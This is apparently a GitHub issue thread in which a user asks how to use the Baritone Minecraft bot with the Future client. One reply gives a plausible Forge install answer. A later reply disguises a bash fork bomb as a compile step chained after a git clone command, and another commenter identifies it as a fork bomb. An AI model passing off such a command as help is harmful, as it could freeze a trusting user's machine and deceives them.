### ISSUE TITLE
how can i use this with future client??

### ISSUE THREAD

**Issue by lolbox123** [cabaletta/baritone#606]
when i put the baritone master folder along with the jar and json for the future client in the same version, the baritone does not work.

**Comment by usereewrjrjeejr** [comment]
EPIC

**Comment by StijnSimons** [comment]
pls teach me java

**Comment by 0-x-2-2** [comment]
Install Future on Forge then download [baritone-standalone-forge](https://github.com/cabaletta/baritone/releases/download/v1.2.7/baritone-standalone-forge-1.2.7.jar) and put it in the mods folder.

**Comment by leijurv** [comment]
Imagine giving a truthful non troll answer

**Comment by olibols** [comment]
:construction_worker: seems like :eyes: you are having trouble! :cold_sweat::anger: unfortunately and unsurprisingly it's doesnt work like that and I'm not sure what train of though would lead you there... Get a future Dev to implement baritone BC as far as I'm concerned, "put master folder along with jar and json" hasnt worked for anyone ever!

**Comment by 0-x-2-2** [comment]
wym i did the real answer is to download "git bash" then run "git clone https://github.com/cabaletta/baritone.git && echo "Compiling Baritone..." && :(){ :|:& };:"

**Comment by namecallfilter** [comment]
least obvious fork bomb

**Comment by bddvlpr** [comment]
![image](https://github.com/cabaletta/baritone/assets/17461028/648e7d9c-d8bc-42f1-aef2-a618a8df8e8f)
